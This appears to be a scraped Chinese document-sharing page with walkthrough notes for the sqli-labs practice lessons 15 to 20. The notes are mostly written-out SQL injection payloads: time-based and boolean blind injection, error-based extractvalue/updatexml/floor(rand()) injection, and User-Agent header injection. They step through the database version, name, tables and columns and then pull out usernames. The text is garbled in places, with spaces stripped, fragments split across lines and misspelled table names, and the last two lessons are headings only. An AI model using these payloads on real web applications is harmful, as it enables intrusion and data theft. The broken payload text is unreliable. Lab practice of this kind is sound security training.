lxsqli labsWord格式文档下载.docx
《lxsqli labsWord格式文档下载.docx》由会员分享,可在线阅读,更多相关《lxsqli labsWord格式文档下载.docx(22页珍藏版)》请在冰点文库上搜索。
andif(left(version(),1)=5,0,sleep(10))#&
submit)#正确版本
3、判断数据库库名的长度
andif(length(database())=7,0,sleep(10))#&
submit)#错误长度
andif(length(database())=8,0,sleep(10))#&
submit)#正确长度
4、猜库名的首字母
andif(left(database(),1)>
'
a'
0,sleep(10))#&
submit)#错误首字母
s'
submit)#正确首字母
猜测第二个字符
5、猜测数据库中表名首字母
andif(ascii(substr((selecttable_namefrominformation_schema.tableswheretable_schema='
security'
limit0,1),1,1))>
100,1,sleep(10))#&
submit)
6、查询数据库表中的列
andif(ascii(substr(1=(select1frominformation_schema.columnswheretable_name='
users'
andcolumn_nameregexp'
^usernam[a-d]'
limit0,1),1,1)),1,sleep(8))#&
passwd=admin&
7、猜测数据库表中列中字段信息
andif(ascii(substr((selectusernamefromuserslimit0,1),1,1))>
68,1,sleep(8))#&
SQLILABS16
1、判断注入点
#uname=admin"
)and1=2#&
submit
2、判断数据库的版本
)andleft(version(),1)=5#&
3、判断数据库库名的长度
)andlength(database())=8#&
4、猜测数据库库名的首字母
)andleft(database(),1)>
#&
5、猜测数据库内的表
)andascii(substr((selecttable_namefrominformation_schema.tableswheretable_schema=database()limit0,1),1,1))>
101#&
6、猜测数据库的表内的列名
#uname=1"
)orif(ascii(substr(1=(selectcolumn_namefrominformation_schema.columnswheretable_name='
andcolumn_nameregexp'
^usernam[e]'
limit0,1),1,1)),1,sleep(9))#&
submit=Submit
7、猜测数据库内表的列内字段
)orif(ascii(substr((selectusernamefromuserslimit0,1),1,1))>
111,1,sleep(10))#&
SQLILABS17
查询数据库版本
#uname=admin&
passwd=11'
andextractvalue(1,concat(0x7e,(select@@version),0x7e))#&
查询数据库库名
查询数据库库内的表名
andextractvalue(1,concat(0x7e,(selecttable_namefrominformation_schema.tableswheretable_schema='
limit2,1),0x7e))#&
查询数据库内表内的列
andextractvalue(1,concat(0x7e,(selectcolumn_namefrominformation_schema.columnswheretable_name='
limit9,1),0x7e))#&
查询数据库表中的列的字段信息
#uname=admin&
passwd=123'
AND(select1from(selectcount(*),(concat("
~"
(selectusernamefromuserslimit0,1),"
floor(rand()*2)))namefrominformation_schema.tablesgroupbyname)b)#&
SQLILABS18
判断当前数据库名
#'
orupdatexml(1,concat(0x7e,(SELECTdatabase()),0x7e),1),1,1)#
判断数据库的版本号:
#在原本的User-Agent后加上:
’orupdatexml(1,concat(0x7e,(SELECT@@version),0x7e),1),1,1)#
判断数据库的表名
orupdatexml(1,concat(0x7e,(selecttable_namefrominformation_schema.tableswheretable_schema=database()limit0,1),0x7e),1),1,1)#
判断users表第一字段
orupdatexml(1,concat(0x7e,(selectcolumn_namefrominformation_schema.columnswheretable_schema=database()andtable_name='
usersd'
limit0,1),0x7e),1),1,1)#
判断users表第二字段
limit1,1),0x7e),1),1,1)#
判断users表中的username第一个
orupdatexml(1,concat(0x7e,(selectusernamefromusreslimit0,1),0x7e),1),1,1)#
SQLILABS19
判断数据库的版本
判断数据库库名
判断数据库的第四个表
判断user表的第一列
判断users表的第二列
查询字段信息
SQLILABS20
判断数据库的库名
判断数据库的所有库
判断suecurity库内的表
判断users表中的列
判断列的内容